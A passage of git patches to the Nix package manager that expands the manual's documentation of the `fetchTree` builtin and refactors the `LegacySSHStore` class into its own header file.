+540,8 @@ # Binary package for various platforms. build = forAllSystems (system: self.packages.${system}.nix); + shellInputs = forAllSystems (system: self.devShells.${system}.default.inputDerivation); + buildStatic = lib.genAttrs linux64BitSystems (system: self.packages.${system}.nix-static); buildCross = forAllCrossSystems (crossSystem: From 3c200da242d8f0ccda447866028bb757e0b0bbd9 Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Sun, 10 Dec 2023 06:16:32 +0100 Subject: [PATCH 084/654] document `fetchTree` (#9258) * document `fetchTree` * display experimental feature note at the top we have to enable the new `fetchTree` experimental feature to render it at all. this was a bug introduced when adding that new feature flag. 
Co-authored-by: tomberek Co-authored-by: Robert Hensing Co-authored-by: Silvan Mosberger --- doc/manual/generate-builtins.nix | 13 +- doc/manual/generate-settings.nix | 4 +- doc/manual/generate-store-info.nix | 4 +- src/libexpr/primops/fetchTree.cc | 242 ++++++++++++++++++++++++----- src/nix/main.cc | 1 + 5 files changed, 221 insertions(+), 43 deletions(-) diff --git a/doc/manual/generate-builtins.nix b/doc/manual/generate-builtins.nix index 05cae1c46..007b698f1 100644 --- a/doc/manual/generate-builtins.nix +++ b/doc/manual/generate-builtins.nix @@ -8,7 +8,15 @@ let showBuiltin = name: { doc, args, arity, experimental-feature }: let experimentalNotice = optionalString (experimental-feature != null) '' - This function is only available if the [${experimental-feature}](@docroot@/contributing/experimental-features.md#xp-feature-${experimental-feature}) experimental feature is enabled. + > **Note** + > + > This function is only available if the [`${experimental-feature}` experimental feature](@docroot@/contributing/experimental-features.md#xp-feature-${experimental-feature}) is enabled. + > + > For example, include the following in [`nix.conf`](@docroot@/command-ref/conf-file.md): + > + > ``` + > extra-experimental-features = ${experimental-feature} + > ``` ''; in squash '' @@ -17,10 +25,9 @@ let
- ${doc} - ${experimentalNotice} + ${doc}
''; listArgs = args: concatStringsSep " " (map (s: "${s}") args); diff --git a/doc/manual/generate-settings.nix b/doc/manual/generate-settings.nix index 74446b70b..504cda362 100644 --- a/doc/manual/generate-settings.nix +++ b/doc/manual/generate-settings.nix @@ -20,10 +20,10 @@ let else "`${setting}`"; # separate body to cleanly handle indentation body = '' - ${description} - ${experimentalFeatureNote} + ${description} + **Default:** ${showDefault documentDefault defaultValue} ${showAliases aliases} diff --git a/doc/manual/generate-store-info.nix b/doc/manual/generate-store-info.nix index 57247a181..c311c3c39 100644 --- a/doc/manual/generate-store-info.nix +++ b/doc/manual/generate-store-info.nix @@ -19,10 +19,10 @@ let result = squash '' # ${name} - ${doc} - ${experimentalFeatureNote} + ${doc} + ## Settings ${showSettings { prefix = "store-${slug}"; inherit inlineHTML; } settings} diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc index 15f870a95..eb2df8626 100644 --- a/src/libexpr/primops/fetchTree.cc +++ b/src/libexpr/primops/fetchTree.cc @@ -187,45 +187,215 @@ static RegisterPrimOp primop_fetchTree({ .name = "fetchTree", .args = {"input"}, .doc = R"( - Fetch a source tree or a plain file using one of the supported backends. - *input* must be a [flake reference](@docroot@/command-ref/new-cli/nix3-flake.md#flake-references), either in attribute set representation or in the URL-like syntax. - The input should be "locked", that is, it should contain a commit hash or content hash unless impure evaluation (`--impure`) is enabled. + Fetch a file system tree or a plain file using one of the supported backends and return an attribute set with: - > **Note** + - the resulting fixed-output [store path](@docroot@/glossary.md#gloss-store-path) + - the corresponding [NAR](@docroot@/glossary.md#gloss-nar) hash + - backend-specific metadata (currently not documented). 
+ + *input* must be an attribute set with the following attributes: + + - `type` (String, required) + + One of the [supported source types](#source-types). + This determines other required and allowed input attributes. + + - `narHash` (String, optional) + + The `narHash` parameter can be used to substitute the source of the tree. + It also allows for verification of tree contents that may not be provided by the underlying transfer mechanism. + If `narHash` is set, the source is first looked up is the Nix store and [substituters](@docroot@/command-ref/conf-file.md#conf-substituters), and only fetched if not available. + + A subset of the output attributes of `fetchTree` can be re-used for subsequent calls to `fetchTree` to produce the same result again. + That is, `fetchTree` is idempotent. + + Downloads are cached in `$XDG_CACHE_HOME/nix`. + The remote source will be fetched from the network if both are true: + - A NAR hash is supplied and the corresponding store path is not [valid](@docroot@/glossary.md#gloss-validity), that is, not available in the store + + > **Note** + > + > [Substituters](@docroot@/command-ref/conf-file.md#conf-substituters) are not used in fetching. + + - There is no cache entry or the cache entry is older than [`tarball-ttl`](@docroot@/command-ref/conf-file.md#conf-tarball-ttl) + + ## Source types + + The following source types and associated input attributes are supported. + + + + - `"file"` + + Place a plain file into the Nix store. + This is similar to [`builtins.fetchurl`](@docroot@/language/builtins.md#builtins-fetchurl) + + - `url` (String, required) + + Supported protocols: + + - `https` + + > **Example** + > + > ```nix + > fetchTree { + > type = "file"; + > url = "https://example.com/index.html"; + > } + > ``` + + - `http` + + Insecure HTTP transfer for legacy sources. + + > **Warning** + > + > HTTP performs no encryption or authentication. + > Use a `narHash` known in advance to ensure the output has expected contents. 
+ + - `file` + + A file on the local file system. + + > **Example** + > + > ```nix + > fetchTree { + > type = "file"; + > url = "file:///home/eelco/nix/README.md"; + > } + > ``` + + - `"tarball"` + + Download a tar archive and extract it into the Nix store. + This has the same underyling implementation as [`builtins.fetchTarball`](@docroot@/language/builtins.md#builtins-fetchTarball) + + - `url` (String, required) + + > **Example** + > + > ```nix + > fetchTree { + > type = "tarball"; + > url = "https://github.com/NixOS/nixpkgs/tarball/nixpkgs-23.11"; + > } + > ``` + + - `"git"` + + Fetch a Git tree and copy it to the Nix store. + This is similar to [`builtins.fetchGit`](@docroot@/language/builtins.md#builtins-fetchGit). + + - `url` (String, required) + + The URL formats supported are the same as for Git itself. + + > **Example** + > + > ```nix + > fetchTree { + > type = "git"; + > url = "git@github.com:NixOS/nixpkgs.git"; + > } + > ``` + + > **Note** + > + > If the URL points to a local directory, and no `ref` or `rev` is given, Nix will only consider files added to the Git index, as listed by `git ls-files` but use the *current file contents* of the Git working directory. + + - `ref` (String, optional) + + A [Git reference](https://git-scm.com/book/en/v2/Git-Internals-Git-References), such as a branch or tag name. + + Default: `"HEAD"` + + - `rev` (String, optional) + + A Git revision; a commit hash. + + Default: the tip of `ref` + + - `shallow` (Bool, optional) + + Make a shallow clone when fetching the Git tree. + + Default: `false` + + - `submodules` (Bool, optional) + + Also fetch submodules if available. + + Default: `false` + + - `allRefs` (Bool, optional) + + If set to `true`, always fetch the entire repository, even if the latest commit is still in the cache. + Otherwise, only the latest commit is fetched if it is not already cached. + + Default: `false` + + - `lastModified` (Integer, optional) + + Unix timestamp of the fetched commit. 
+ + If set, pass through the value to the output attribute set. + Otherwise, generated from the fetched Git tree. + + - `revCount` (Integer, optional) + + Number of revisions in the history of the Git repository before the fetched commit. + + If set, pass through the value to the output attribute set. + Otherwise, generated from the fetched Git tree. + + The following input types are still subject to change: + + - `"path"` + - `"github"` + - `"gitlab"` + - `"sourcehut"` + - `"mercurial"` + + *input* can also be a [URL-like reference](@docroot@/command-ref/new-cli/nix3-flake.md#flake-references). + The additional input types and the URL-like syntax requires the [`flakes` experimental feature](@docroot@/contributing/experimental-features.md#xp-feature-flakes) to be enabled. + + > **Example** > - > The URL-like syntax requires the [`flakes` experimental feature](@docroot@/contributing/experimental-features.md#xp-feature-flakes) to be enabled. + > Fetch a GitHub repository using the attribute set representation: + > + > ```nix + > builtins.fetchTree { + > type = "github"; + > owner = "NixOS"; + > repo = "nixpkgs"; + > rev = "ae2e6b3958682513d28f7d633734571fb18285dd"; + > } + > ``` + > + > This evaluates to the following attribute set: + > + > ```nix + > { + > lastModified = 1686503798; + > lastModifiedDate = "20230611171638"; + > narHash = "sha256-rA9RqKP9OlBrgGCPvfd5HVAXDOy8k2SmPtB/ijShNXc="; + > outPath = "/nix/store/l5m6qlvfs9sdw14ja3qbzpglcjlb6j1x-source"; + > rev = "ae2e6b3958682513d28f7d633734571fb18285dd"; + > shortRev = "ae2e6b3"; + > } + > ``` - Here are some examples of how to use `fetchTree`: - - - Fetch a GitHub repository using the attribute set representation: - - ```nix - builtins.fetchTree { - type = "github"; - owner = "NixOS"; - repo = "nixpkgs"; - rev = "ae2e6b3958682513d28f7d633734571fb18285dd"; - } - ``` - - This evaluates to the following attribute set: - - ``` - { - lastModified = 1686503798; - lastModifiedDate = "20230611171638"; - narHash = 
"sha256-rA9RqKP9OlBrgGCPvfd5HVAXDOy8k2SmPtB/ijShNXc="; - outPath = "/nix/store/l5m6qlvfs9sdw14ja3qbzpglcjlb6j1x-source"; - rev = "ae2e6b3958682513d28f7d633734571fb18285dd"; - shortRev = "ae2e6b3"; - } - ``` - - - Fetch the same GitHub repository using the URL-like syntax: - - ``` - builtins.fetchTree "github:NixOS/nixpkgs/ae2e6b3958682513d28f7d633734571fb18285dd" - ``` + > **Example** + > + > Fetch the same GitHub repository using the URL-like syntax: + > + > ```nix + > builtins.fetchTree "github:NixOS/nixpkgs/ae2e6b3958682513d28f7d633734571fb18285dd" + > ``` )", .fun = prim_fetchTree, .experimentalFeature = Xp::FetchTree, diff --git a/src/nix/main.cc b/src/nix/main.cc index 109d2cc04..39c04069b 100644 --- a/src/nix/main.cc +++ b/src/nix/main.cc @@ -373,6 +373,7 @@ void mainWrapped(int argc, char * * argv) Xp::Flakes, Xp::FetchClosure, Xp::DynamicDerivations, + Xp::FetchTree, }; evalSettings.pureEval = false; EvalState state({}, openStore("dummy://")); From deadb3bfe9cde3e78e8e89340e4c92499069461a Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 10 Dec 2023 14:28:14 -0500 Subject: [PATCH 085/654] Create header for `LegacySSHStore` In https://github.com/NixOS/nix/pull/6134#issuecomment-1079199888, @thuffschmitt proposed exposing `LegacySSHStore` in Nix for deduplication with Hydra, at least temporarily. I think that is a good idea. Note that the diff will look bad unless one ignores whitespace! 
Also try this locally: ```shell-session git diff --ignore-all-space HEAD^:src/libstore/legacy-ssh-store.cc HEAD:src/libstore/legacy-ssh-store.cc git diff --ignore-all-space HEAD^:src/libstore/legacy-ssh-store.cc HEAD:src/libstore/legacy-ssh-store.hh ``` --- src/libstore/legacy-ssh-store.cc | 726 ++++++++++++++----------------- src/libstore/legacy-ssh-store.hh | 132 ++++++ 2 files changed, 466 insertions(+), 392 deletions(-) create mode 100644 src/libstore/legacy-ssh-store.hh diff --git a/src/libstore/legacy-ssh-store.cc b/src/libstore/legacy-ssh-store.cc index 8ef2daa7b..06bef9d08 100644 --- a/src/libstore/legacy-ssh-store.cc +++ b/src/libstore/legacy-ssh-store.cc @@ -1,3 +1,4 @@ +#include "legacy-ssh-store.hh" #include "ssh-store-config.hh" #include "archive.hh" #include "pool.hh" @@ -13,414 +14,355 @@ namespace nix { -struct LegacySSHStoreConfig : virtual CommonSSHStoreConfig +std::string LegacySSHStoreConfig::doc() { - using CommonSSHStoreConfig::CommonSSHStoreConfig; + return + #include "legacy-ssh-store.md" + ; +} - const Setting remoteProgram{this, "nix-store", "remote-program", - "Path to the `nix-store` executable on the remote machine."}; - const Setting maxConnections{this, 1, "max-connections", - "Maximum number of concurrent SSH connections."}; - - const std::string name() override { return "SSH Store"; } - - std::string doc() override - { - return - #include "legacy-ssh-store.md" - ; - } -}; - -struct LegacySSHStore : public virtual LegacySSHStoreConfig, public virtual Store +struct LegacySSHStore::Connection { - // Hack for getting remote build log output. - // Intentionally not in `LegacySSHStoreConfig` so that it doesn't appear in - // the documentation - const Setting logFD{this, -1, "log-fd", "file descriptor to which SSH's stderr is connected"}; - - struct Connection - { - std::unique_ptr sshConn; - FdSink to; - FdSource from; - ServeProto::Version remoteVersion; - bool good = true; - - /** - * Coercion to `ServeProto::ReadConn`. 
This makes it easy to use the - * factored out serve protocol searlizers with a - * `LegacySSHStore::Connection`. - * - * The serve protocol connection types are unidirectional, unlike - * this type. - */ - operator ServeProto::ReadConn () - { - return ServeProto::ReadConn { - .from = from, - .version = remoteVersion, - }; - } - - /* - * Coercion to `ServeProto::WriteConn`. This makes it easy to use the - * factored out serve protocol searlizers with a - * `LegacySSHStore::Connection`. - * - * The serve protocol connection types are unidirectional, unlike - * this type. - */ - operator ServeProto::WriteConn () - { - return ServeProto::WriteConn { - .to = to, - .version = remoteVersion, - }; - } - }; - - std::string host; - - ref> connections; - - SSHMaster master; - - static std::set uriSchemes() { return {"ssh"}; } - - LegacySSHStore(const std::string & scheme, const std::string & host, const Params & params) - : StoreConfig(params) - , CommonSSHStoreConfig(params) - , LegacySSHStoreConfig(params) - , Store(params) - , host(host) - , connections(make_ref>( - std::max(1, (int) maxConnections), - [this]() { return openConnection(); }, - [](const ref & r) { return r->good; } - )) - , master( - host, - sshKey, - sshPublicHostKey, - // Use SSH master only if using more than 1 connection. - connections->capacity() > 1, - compress, - logFD) - { - } - - ref openConnection() - { - auto conn = make_ref(); - conn->sshConn = master.startCommand( - fmt("%s --serve --write", remoteProgram) - + (remoteStore.get() == "" ? 
"" : " --store " + shellEscape(remoteStore.get()))); - conn->to = FdSink(conn->sshConn->in.get()); - conn->from = FdSource(conn->sshConn->out.get()); - - try { - conn->to << SERVE_MAGIC_1 << SERVE_PROTOCOL_VERSION; - conn->to.flush(); - - StringSink saved; - try { - TeeSource tee(conn->from, saved); - unsigned int magic = readInt(tee); - if (magic != SERVE_MAGIC_2) - throw Error("'nix-store --serve' protocol mismatch from '%s'", host); - } catch (SerialisationError & e) { - /* In case the other side is waiting for our input, - close it. */ - conn->sshConn->in.close(); - auto msg = conn->from.drain(); - throw Error("'nix-store --serve' protocol mismatch from '%s', got '%s'", - host, chomp(saved.s + msg)); - } - conn->remoteVersion = readInt(conn->from); - if (GET_PROTOCOL_MAJOR(conn->remoteVersion) != 0x200) - throw Error("unsupported 'nix-store --serve' protocol version on '%s'", host); - - } catch (EndOfFile & e) { - throw Error("cannot connect to '%1%'", host); - } - - return conn; - }; - - std::string getUri() override - { - return *uriSchemes().begin() + "://" + host; - } - - void queryPathInfoUncached(const StorePath & path, - Callback> callback) noexcept override - { - try { - auto conn(connections->get()); - - /* No longer support missing NAR hash */ - assert(GET_PROTOCOL_MINOR(conn->remoteVersion) >= 4); - - debug("querying remote host '%s' for info on '%s'", host, printStorePath(path)); - - conn->to << ServeProto::Command::QueryPathInfos << PathSet{printStorePath(path)}; - conn->to.flush(); - - auto p = readString(conn->from); - if (p.empty()) return callback(nullptr); - auto path2 = parseStorePath(p); - assert(path == path2); - auto info = std::make_shared( - path, - ServeProto::Serialise::read(*this, *conn)); - - if (info->narHash == Hash::dummy) - throw Error("NAR hash is now mandatory"); - - auto s = readString(conn->from); - assert(s == ""); - - callback(std::move(info)); - } catch (...) 
{ callback.rethrow(); } - } - - void addToStore(const ValidPathInfo & info, Source & source, - RepairFlag repair, CheckSigsFlag checkSigs) override - { - debug("adding path '%s' to remote host '%s'", printStorePath(info.path), host); - - auto conn(connections->get()); - - if (GET_PROTOCOL_MINOR(conn->remoteVersion) >= 5) { - - conn->to - << ServeProto::Command::AddToStoreNar - << printStorePath(info.path) - << (info.deriver ? printStorePath(*info.deriver) : "") - << info.narHash.to_string(HashFormat::Base16, false); - ServeProto::write(*this, *conn, info.references); - conn->to - << info.registrationTime - << info.narSize - << info.ultimate - << info.sigs - << renderContentAddress(info.ca); - try { - copyNAR(source, conn->to); - } catch (...) { - conn->good = false; - throw; - } - conn->to.flush(); - - } else { - - conn->to - << ServeProto::Command::ImportPaths - << 1; - try { - copyNAR(source, conn->to); - } catch (...) { - conn->good = false; - throw; - } - conn->to - << exportMagic - << printStorePath(info.path); - ServeProto::write(*this, *conn, info.references); - conn->to - << (info.deriver ? 
printStorePath(*info.deriver) : "") - << 0 - << 0; - conn->to.flush(); - - } - - if (readInt(conn->from) != 1) - throw Error("failed to add path '%s' to remote host '%s'", printStorePath(info.path), host); - } - - void narFromPath(const StorePath & path, Sink & sink) override - { - auto conn(connections->get()); - - conn->to << ServeProto::Command::DumpStorePath << printStorePath(path); - conn->to.flush(); - copyNAR(conn->from, sink); - } - - std::optional queryPathFromHashPart(const std::string & hashPart) override - { unsupported("queryPathFromHashPart"); } - - StorePath addToStore( - std::string_view name, - const Path & srcPath, - FileIngestionMethod method, - HashAlgorithm hashAlgo, - PathFilter & filter, - RepairFlag repair, - const StorePathSet & references) override - { unsupported("addToStore"); } - - StorePath addTextToStore( - std::string_view name, - std::string_view s, - const StorePathSet & references, - RepairFlag repair) override - { unsupported("addTextToStore"); } - -private: - - void putBuildSettings(Connection & conn) - { - ServeProto::write(*this, conn, ServeProto::BuildOptions { - .maxSilentTime = settings.maxSilentTime, - .buildTimeout = settings.buildTimeout, - .maxLogSize = settings.maxLogSize, - .nrRepeats = 0, // buildRepeat hasn't worked for ages anyway - .enforceDeterminism = 0, - .keepFailed = settings.keepFailed, - }); - } - -public: - - BuildResult buildDerivation(const StorePath & drvPath, const BasicDerivation & drv, - BuildMode buildMode) override - { - auto conn(connections->get()); - - conn->to - << ServeProto::Command::BuildDerivation - << printStorePath(drvPath); - writeDerivation(conn->to, *this, drv); - - putBuildSettings(*conn); - - conn->to.flush(); - - return ServeProto::Serialise::read(*this, *conn); - } - - void buildPaths(const std::vector & drvPaths, BuildMode buildMode, std::shared_ptr evalStore) override - { - if (evalStore && evalStore.get() != this) - throw Error("building on an SSH store is incompatible with 
'--eval-store'"); - - auto conn(connections->get()); - - conn->to << ServeProto::Command::BuildPaths; - Strings ss; - for (auto & p : drvPaths) { - auto sOrDrvPath = StorePathWithOutputs::tryFromDerivedPath(p); - std::visit(overloaded { - [&](const StorePathWithOutputs & s) { - ss.push_back(s.to_string(*this)); - }, - [&](const StorePath & drvPath) { - throw Error("wanted to fetch '%s' but the legacy ssh protocol doesn't support merely substituting drv files via the build paths command. It would build them instead. Try using ssh-ng://", printStorePath(drvPath)); - }, - [&](std::monostate) { - throw Error("wanted build derivation that is itself a build product, but the legacy ssh protocol doesn't support that. Try using ssh-ng://"); - }, - }, sOrDrvPath); - } - conn->to << ss; - - putBuildSettings(*conn); - - conn->to.flush(); - - BuildResult result; - result.status = (BuildResult::Status) readInt(conn->from); - - if (!result.success()) { - conn->from >> result.errorMsg; - throw Error(result.status, result.errorMsg); - } - } - - void ensurePath(const StorePath & path) override - { unsupported("ensurePath"); } - - virtual ref getFSAccessor(bool requireValidPath) override - { unsupported("getFSAccessor"); } + std::unique_ptr sshConn; + FdSink to; + FdSource from; + ServeProto::Version remoteVersion; + bool good = true; /** - * The default instance would schedule the work on the client side, but - * for consistency with `buildPaths` and `buildDerivation` it should happen - * on the remote side. + * Coercion to `ServeProto::ReadConn`. This makes it easy to use the + * factored out serve protocol searlizers with a + * `LegacySSHStore::Connection`. * - * We make this fail for now so we can add implement this properly later - * without it being a breaking change. + * The serve protocol connection types are unidirectional, unlike + * this type. 
*/ - void repairPath(const StorePath & path) override - { unsupported("repairPath"); } - - void computeFSClosure(const StorePathSet & paths, - StorePathSet & out, bool flipDirection = false, - bool includeOutputs = false, bool includeDerivers = false) override + operator ServeProto::ReadConn () { - if (flipDirection || includeDerivers) { - Store::computeFSClosure(paths, out, flipDirection, includeOutputs, includeDerivers); - return; - } - - auto conn(connections->get()); - - conn->to - << ServeProto::Command::QueryClosure - << includeOutputs; - ServeProto::write(*this, *conn, paths); - conn->to.flush(); - - for (auto & i : ServeProto::Serialise::read(*this, *conn)) - out.insert(i); + return ServeProto::ReadConn { + .from = from, + .version = remoteVersion, + }; } - StorePathSet queryValidPaths(const StorePathSet & paths, - SubstituteFlag maybeSubstitute = NoSubstitute) override - { - auto conn(connections->get()); - - conn->to - << ServeProto::Command::QueryValidPaths - << false // lock - << maybeSubstitute; - ServeProto::write(*this, *conn, paths); - conn->to.flush(); - - return ServeProto::Serialise::read(*this, *conn); - } - - void connect() override - { - auto conn(connections->get()); - } - - unsigned int getProtocol() override - { - auto conn(connections->get()); - return conn->remoteVersion; - } - - /** - * The legacy ssh protocol doesn't support checking for trusted-user. - * Try using ssh-ng:// instead if you want to know. + /* + * Coercion to `ServeProto::WriteConn`. This makes it easy to use the + * factored out serve protocol serializers with a + * `LegacySSHStore::Connection`. + * + * The serve protocol connection types are unidirectional, unlike + * this type.
*/ - std::optional isTrustedClient() override + operator ServeProto::WriteConn () { - return std::nullopt; + return ServeProto::WriteConn { + .to = to, + .version = remoteVersion, + }; } - - void queryRealisationUncached(const DrvOutput &, - Callback> callback) noexcept override - // TODO: Implement - { unsupported("queryRealisation"); } }; + +LegacySSHStore::LegacySSHStore(const std::string & scheme, const std::string & host, const Params & params) + : StoreConfig(params) + , CommonSSHStoreConfig(params) + , LegacySSHStoreConfig(params) + , Store(params) + , host(host) + , connections(make_ref>( + std::max(1, (int) maxConnections), + [this]() { return openConnection(); }, + [](const ref & r) { return r->good; } + )) + , master( + host, + sshKey, + sshPublicHostKey, + // Use SSH master only if using more than 1 connection. + connections->capacity() > 1, + compress, + logFD) +{ +} + + +ref LegacySSHStore::openConnection() +{ + auto conn = make_ref(); + conn->sshConn = master.startCommand( + fmt("%s --serve --write", remoteProgram) + + (remoteStore.get() == "" ? "" : " --store " + shellEscape(remoteStore.get()))); + conn->to = FdSink(conn->sshConn->in.get()); + conn->from = FdSource(conn->sshConn->out.get()); + + try { + conn->to << SERVE_MAGIC_1 << SERVE_PROTOCOL_VERSION; + conn->to.flush(); + + StringSink saved; + try { + TeeSource tee(conn->from, saved); + unsigned int magic = readInt(tee); + if (magic != SERVE_MAGIC_2) + throw Error("'nix-store --serve' protocol mismatch from '%s'", host); + } catch (SerialisationError & e) { + /* In case the other side is waiting for our input, + close it. 
*/ + conn->sshConn->in.close(); + auto msg = conn->from.drain(); + throw Error("'nix-store --serve' protocol mismatch from '%s', got '%s'", + host, chomp(saved.s + msg)); + } + conn->remoteVersion = readInt(conn->from); + if (GET_PROTOCOL_MAJOR(conn->remoteVersion) != 0x200) + throw Error("unsupported 'nix-store --serve' protocol version on '%s'", host); + + } catch (EndOfFile & e) { + throw Error("cannot connect to '%1%'", host); + } + + return conn; +}; + + +std::string LegacySSHStore::getUri() +{ + return *uriSchemes().begin() + "://" + host; +} + + +void LegacySSHStore::queryPathInfoUncached(const StorePath & path, + Callback> callback) noexcept +{ + try { + auto conn(connections->get()); + + /* No longer support missing NAR hash */ + assert(GET_PROTOCOL_MINOR(conn->remoteVersion) >= 4); + + debug("querying remote host '%s' for info on '%s'", host, printStorePath(path)); + + conn->to << ServeProto::Command::QueryPathInfos << PathSet{printStorePath(path)}; + conn->to.flush(); + + auto p = readString(conn->from); + if (p.empty()) return callback(nullptr); + auto path2 = parseStorePath(p); + assert(path == path2); + auto info = std::make_shared( + path, + ServeProto::Serialise::read(*this, *conn)); + + if (info->narHash == Hash::dummy) + throw Error("NAR hash is now mandatory"); + + auto s = readString(conn->from); + assert(s == ""); + + callback(std::move(info)); + } catch (...) { callback.rethrow(); } +} + + +void LegacySSHStore::addToStore(const ValidPathInfo & info, Source & source, + RepairFlag repair, CheckSigsFlag checkSigs) +{ + debug("adding path '%s' to remote host '%s'", printStorePath(info.path), host); + + auto conn(connections->get()); + + if (GET_PROTOCOL_MINOR(conn->remoteVersion) >= 5) { + + conn->to + << ServeProto::Command::AddToStoreNar + << printStorePath(info.path) + << (info.deriver ? 
printStorePath(*info.deriver) : "") + << info.narHash.to_string(HashFormat::Base16, false); + ServeProto::write(*this, *conn, info.references); + conn->to + << info.registrationTime + << info.narSize + << info.ultimate + << info.sigs + << renderContentAddress(info.ca); + try { + copyNAR(source, conn->to); + } catch (...) { + conn->good = false; + throw; + } + conn->to.flush(); + + } else { + + conn->to + << ServeProto::Command::ImportPaths + << 1; + try { + copyNAR(source, conn->to); + } catch (...) { + conn->good = false; + throw; + } + conn->to + << exportMagic + << printStorePath(info.path); + ServeProto::write(*this, *conn, info.references); + conn->to + << (info.deriver ? printStorePath(*info.deriver) : "") + << 0 + << 0; + conn->to.flush(); + + } + + if (readInt(conn->from) != 1) + throw Error("failed to add path '%s' to remote host '%s'", printStorePath(info.path), host); +} + + +void LegacySSHStore::narFromPath(const StorePath & path, Sink & sink) +{ + auto conn(connections->get()); + + conn->to << ServeProto::Command::DumpStorePath << printStorePath(path); + conn->to.flush(); + copyNAR(conn->from, sink); +} + + +void LegacySSHStore::putBuildSettings(Connection & conn) +{ + ServeProto::write(*this, conn, ServeProto::BuildOptions { + .maxSilentTime = settings.maxSilentTime, + .buildTimeout = settings.buildTimeout, + .maxLogSize = settings.maxLogSize, + .nrRepeats = 0, // buildRepeat hasn't worked for ages anyway + .enforceDeterminism = 0, + .keepFailed = settings.keepFailed, + }); +} + + +BuildResult LegacySSHStore::buildDerivation(const StorePath & drvPath, const BasicDerivation & drv, + BuildMode buildMode) +{ + auto conn(connections->get()); + + conn->to + << ServeProto::Command::BuildDerivation + << printStorePath(drvPath); + writeDerivation(conn->to, *this, drv); + + putBuildSettings(*conn); + + conn->to.flush(); + + return ServeProto::Serialise::read(*this, *conn); +} + + +void LegacySSHStore::buildPaths(const std::vector & drvPaths, BuildMode 
buildMode, std::shared_ptr evalStore) +{ + if (evalStore && evalStore.get() != this) + throw Error("building on an SSH store is incompatible with '--eval-store'"); + + auto conn(connections->get()); + + conn->to << ServeProto::Command::BuildPaths; + Strings ss; + for (auto & p : drvPaths) { + auto sOrDrvPath = StorePathWithOutputs::tryFromDerivedPath(p); + std::visit(overloaded { + [&](const StorePathWithOutputs & s) { + ss.push_back(s.to_string(*this)); + }, + [&](const StorePath & drvPath) { + throw Error("wanted to fetch '%s' but the legacy ssh protocol doesn't support merely substituting drv files via the build paths command. It would build them instead. Try using ssh-ng://", printStorePath(drvPath)); + }, + [&](std::monostate) { + throw Error("wanted build derivation that is itself a build product, but the legacy ssh protocol doesn't support that. Try using ssh-ng://"); + }, + }, sOrDrvPath); + } + conn->to << ss; + + putBuildSettings(*conn); + + conn->to.flush(); + + BuildResult result; + result.status = (BuildResult::Status) readInt(conn->from); + + if (!result.success()) { + conn->from >> result.errorMsg; + throw Error(result.status, result.errorMsg); + } +} + + +void LegacySSHStore::computeFSClosure(const StorePathSet & paths, + StorePathSet & out, bool flipDirection, + bool includeOutputs, bool includeDerivers) +{ + if (flipDirection || includeDerivers) { + Store::computeFSClosure(paths, out, flipDirection, includeOutputs, includeDerivers); + return; + } + + auto conn(connections->get()); + + conn->to + << ServeProto::Command::QueryClosure + << includeOutputs; + ServeProto::write(*this, *conn, paths); + conn->to.flush(); + + for (auto & i : ServeProto::Serialise::read(*this, *conn)) + out.insert(i); +} + + +StorePathSet LegacySSHStore::queryValidPaths(const StorePathSet & paths, + SubstituteFlag maybeSubstitute) +{ + auto conn(connections->get()); + + conn->to + << ServeProto::Command::QueryValidPaths + << false // lock + << maybeSubstitute; + 
ServeProto::write(*this, *conn, paths); + conn->to.flush(); + + return ServeProto::Serialise::read(*this, *conn); +} + + +void LegacySSHStore::connect() +{ + auto conn(connections->get()); +} + + +unsigned int LegacySSHStore::getProtocol() +{ + auto conn(connections->get()); + return conn->remoteVersion; +} + + +/** + * The legacy ssh protocol doesn't support checking for trusted-user. + * Try using ssh-ng:// instead if you want to know. + */ +std::optional isTrustedClient() +{ + return std::nullopt; +} + + static RegisterStoreImplementation regLegacySSHStore; } diff --git a/src/libstore/legacy-ssh-store.hh b/src/libstore/legacy-ssh-store.hh new file mode 100644 index 000000000..c40c256bb --- /dev/null +++ b/src/libstore/legacy-ssh-store.hh @@ -0,0 +1,132 @@ +#pragma once +///@file + +#include "ssh-store-config.hh" +#include "store-api.hh" +#include "ssh.hh" +#include "callback.hh" +#include "pool.hh" + +namespace nix { + +struct LegacySSHStoreConfig : virtual CommonSSHStoreConfig +{ + using CommonSSHStoreConfig::CommonSSHStoreConfig; + + const Setting remoteProgram{this, "nix-store", "remote-program", + "Path to the `nix-store` executable on the remote machine."}; + + const Setting maxConnections{this, 1, "max-connections", + "Maximum number of concurrent SSH connections."}; + + const std::string name() override { return "SSH Store"; } + + std::string doc() override; +}; + +struct LegacySSHStore : public virtual LegacySSHStoreConfig, public virtual Store +{ + // Hack for getting remote build log output. 
+ // Intentionally not in `LegacySSHStoreConfig` so that it doesn't appear in + // the documentation + const Setting logFD{this, -1, "log-fd", "file descriptor to which SSH's stderr is connected"}; + + struct Connection; + + std::string host; + + ref> connections; + + SSHMaster master; + + static std::set uriSchemes() { return {"ssh"}; } + + LegacySSHStore(const std::string & scheme, const std::string & host, const Params & params); + + ref openConnection(); + + std::string getUri() override; + + void queryPathInfoUncached(const StorePath & path, + Callback> callback) noexcept override; + + void addToStore(const ValidPathInfo & info, Source & source, + RepairFlag repair, CheckSigsFlag checkSigs) override; + + void narFromPath(const StorePath & path, Sink & sink) override; + + std::optional queryPathFromHashPart(const std::string & hashPart) override + { unsupported("queryPathFromHashPart"); } + + StorePath addToStore( + std::string_view name, + const Path & srcPath, + FileIngestionMethod method, + HashAlgorithm hashAlgo, + PathFilter & filter, + RepairFlag repair, + const StorePathSet & references) override + { unsupported("addToStore"); } + + StorePath addTextToStore( + std::string_view name, + std::string_view s, + const StorePathSet & references, + RepairFlag repair) override + { unsupported("addTextToStore"); } + +private: + + void putBuildSettings(Connection & conn); + +public: + + BuildResult buildDerivation(const StorePath & drvPath, const BasicDerivation & drv, + BuildMode buildMode) override; + + void buildPaths(const std::vector & drvPaths, BuildMode buildMode, std::shared_ptr evalStore) override; + + void ensurePath(const StorePath & path) override + { unsupported("ensurePath"); } + + virtual ref getFSAccessor(bool requireValidPath) override + { unsupported("getFSAccessor"); } + + /** + * The default instance would schedule the work on the client side, but + * for consistency with `buildPaths` and `buildDerivation` it should happen + * on the remote 
